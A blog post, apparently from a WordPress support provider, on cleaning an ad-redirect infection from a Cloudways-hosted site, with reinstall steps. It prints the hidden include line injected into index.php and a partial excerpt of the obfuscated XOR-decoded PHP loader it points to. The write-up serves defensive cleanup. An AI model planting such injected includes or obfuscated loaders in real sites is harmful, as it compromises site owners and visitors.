Home Experience & Tips Sharing Standard Post

Standard Post

How to Clean a Website After It Gets Infected with a Virus on CloudWays

Today, I encountered a client's website hosted on Cloudways servers. The WordPress site automatically redirects to third-party ad websites when accessed via mobile, which is a clear symptom of infection. This article records how to clean up this ad redirect virus. The principle is similar to previous ad redirect viruses, all through plugins or...

Updated on September 13, 2023 About 3 minutes reading

Today, I encountered a client's website hosted on a Cloudways server. The WordPress site automatically redirects to third-party advertising websites when accessed via mobile, which is a clear symptom of a virus infection. This article documents how to clean this ad-redirect virus.

The principle is similar to previous ad-redirect viruses: they exploit vulnerabilities in plugins or WordPress itself to upload malicious files to the server. For example, in the index.php file, we discovered this string of encrypted code.

<?php
/*85ba2*/

@include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti");

/*85ba2*/

The file points to a file named .c963ccee.oti, containing partial content as follows:

<?php
$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;
$o8dk17mz = "";
$o8dk17mz .= $ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E");
$o8dk17mz .= $ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");

The code is too long to decrypt completely. However, based on Naiba's experience, it's clear this is a virus file without needing decryption. Normal WordPress program files are open-source and do not contain encrypted code.

Besides this one, there are other interfering files in the folder, which won't be listed one by one here.

Once the infection method is analyzed, the solution is simple: delete the virus files and replace them with clean ones.

The simplest method is to delete all WordPress files and reinstall. Of course, files under the uploads directory must be manually preserved; otherwise, all website images will be lost after reinstallation.

Cloudways is a managed VPS, so users do not have the highest permissions. Using SFTP or SSH, you still lack the permission to delete virus files, so you need to contact customer support for assistance.

Finally, the steps to handle a virus-infected website on Cloudways:

  1. Back up the infected website data for reference;
  2. Delete all files and folders except the wp-content/uploads folder (requires contacting customer support for deletion, as permissions are insufficient).
  3. Re-download the WordPress installation package and install the WordPress website;
  4. Reinstall the previous Theme and Plugin.

After completing these operations, the virus files will be gone. If you can't handle it, you canpay Naiba to handle it

4/5 - (3 votes)
Previous Record of cleaning the scriptsplatform.com pop-up ad virus from a WordPress website Continue reading content around the same timeline. Next What is the WordPress Admin Login Username and Password? How to Recover Your Account View the next related tutorial or experience.

AI Website Building Assistant

🤖
Hello! I am the Naibabiji AI Assistant. How can I help you?
Quick Consultation: